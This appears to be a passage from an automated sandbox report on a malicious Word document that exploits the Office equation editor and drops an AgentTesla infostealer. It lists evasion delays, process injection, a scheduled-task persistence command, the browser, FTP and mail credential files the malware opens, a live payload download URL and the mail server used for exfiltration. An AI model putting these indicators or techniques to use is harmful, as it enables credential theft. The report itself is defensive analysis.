                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWindow / User API: threadDelayed 9619
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2804Thread sleep time: -300000s >= -30000s
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2804Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2188Thread sleep time: -47836s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2188Thread sleep time: -40000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 3016Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2276Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 1916Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2488Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe TID: 2488Thread sleep time: -150000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 47836
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 40000
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeThread delayed: delay time: 30000
                Source: merciesxdncdc.exeBinary or memory string: DdUXhZQ[fUE6Ws]YTSk6WLInYD73f[o5QsEYYq{nV]8XY[8XVpEzfoQZd5M[]WMZ][<IgogJD}4pfy]3[3Y5]DL[]}Y4[3Y5]D75esU[\moJezE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeMemory written: C:\Users\user\AppData\Roaming\merciesxdncdc.exe base: 400000 value starts with: 4D5A
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeProcess created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: merciesxdncdc.exe, 00000007.00000002.2346712504.0000000000C50000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeQueries volume information: C:\Users\user\AppData\Roaming\merciesxdncdc.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeQueries volume information: C:\Users\user\AppData\Roaming\merciesxdncdc.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                Source: Yara matchFile source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY

                Remote Access Functionality:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 7.2.merciesxdncdc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2347184343.000000000250A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: merciesxdncdc.exe PID: 2728, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture21System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerQuery Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Software Packing2NTDSSecurity Software Discovery211Distributed Component Object ModelInput Capture21Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol32Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 452655 Sample: PAYMENT ADVICE.doc Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for dropped file 2->40 42 9 other signatures 2->42 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 23 2->12         started        process3 dnsIp4 34 maritradeshipplng.com 104.21.27.166, 49167, 80 CLOUDFLARENETUS United States 7->34 24 C:\Users\user\AppData\...\merciesxdncdc.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\okilo[1].exe, PE32 7->26 dropped 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->52 14 merciesxdncdc.exe 1 8 7->14         started        file5 signatures6 process7 file8 28 C:\Users\user\AppData\Roaming\JxCmQoa.exe, PE32 14->28 dropped 30 C:\Users\user\AppData\Local\...\tmp2E52.tmp, XML 14->30 dropped 54 Multi AV Scanner detection for dropped file 14->54 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->56 58 Machine Learning detection for dropped file 14->58 60 4 other signatures 14->60 18 merciesxdncdc.exe 12 14->18         started        22 schtasks.exe 14->22         started        signatures9 process10 dnsIp11 32 mail.privateemail.com 198.54.122.60, 49168, 49170, 49171 NAMECHEAP-NETUS United States 18->32 44 Tries to steal Mail credentials (via file access) 18->44 46 Tries to harvest and steal ftp login credentials 18->46 48 Tries to harvest and steal browser information (history, passwords, etc) 18->48 50 Installs a global keyboard hook 18->50 signatures12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PAYMENT ADVICE.doc26%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\merciesxdncdc.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\JxCmQoa.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe24%ReversingLabsByteCode-MSIL.Infostealer.Coins
                C:\Users\user\AppData\Roaming\JxCmQoa.exe24%ReversingLabsByteCode-MSIL.Infostealer.Coins
                C:\Users\user\AppData\Roaming\merciesxdncdc.exe24%ReversingLabsByteCode-MSIL.Infostealer.Coins

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                7.2.merciesxdncdc.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.a-cert.at0E0%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://www.e-me.lv/repository00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/LCRacraiz.crl00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.certifikat.dk/repository00%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://www.chambersign.org10%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                http://IXudBJ.com0%Avira URL Cloudsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl00%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.post.trust.ie/reposit/cps.html00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.sk.ee/cps/00%URL Reputationsafe
                http://www.certicamara.com00%URL Reputationsafe
                http://www.certicamara.com00%URL Reputationsafe
                http://www.certicamara.com00%URL Reputationsafe
                http://www.globaltrust.info0=0%Avira URL Cloudsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                http://servername/isapibackend.dll0%Avira URL Cloudsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://www.ssc.lt/cps030%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://ocsp.pki.gva.es00%URL Reputationsafe
                http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.dnie.es/dpc00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.rootca.or.kr/rca/cps.html00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.trustcenter.de/guidelines00%URL Reputationsafe
                http://www.globaltrust.info00%URL Reputationsafe
                http://www.globaltrust.info00%URL Reputationsafe
                http://www.globaltrust.info00%URL Reputationsafe
                https://www.catcert.net/verarrel0%URL Reputationsafe
                https://www.catcert.net/verarrel0%URL Reputationsafe
                https://www.catcert.net/verarrel0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                maritradeshipplng.com
                104.21.27.166
                truetrue
                  unknown
                  mail.privateemail.com
                  198.54.122.60
                  truefalse
                    high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://maritradeshipplng.com/wayss/okilo.exetrue
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://127.0.0.1:HTTP/1.1merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.a-cert.at0Emerciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.e-me.lv/repository0merciesxdncdc.exe, 00000007.00000003.2227055337.000000000628C000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.chambersign.org/chambersroot.crl0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0merciesxdncdc.exe, 00000007.00000003.2226349491.00000000062A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.certifikat.dk/repository0merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.chambersign.org1merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.pkioverheid.nl/policies/root-policy0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://repository.swisssign.com/0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      high
                      http://IXudBJ.commerciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlmerciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.certplus.com/CRL/class3P.crl0merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.post.trust.ie/reposit/cps.html0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.certplus.com/CRL/class2.crl0merciesxdncdc.exe, 00000007.00000003.2226188928.00000000062DF000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.sk.ee/cps/0merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.certicamara.com0merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.globaltrust.info0=merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0Emerciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipmerciesxdncdc.exe, 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://servername/isapibackend.dllmerciesxdncdc.exe, 00000007.00000002.2354088595.0000000007970000.00000002.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.ssc.lt/cps03merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#merciesxdncdc.exe, 00000007.00000002.2351633148.0000000006293000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
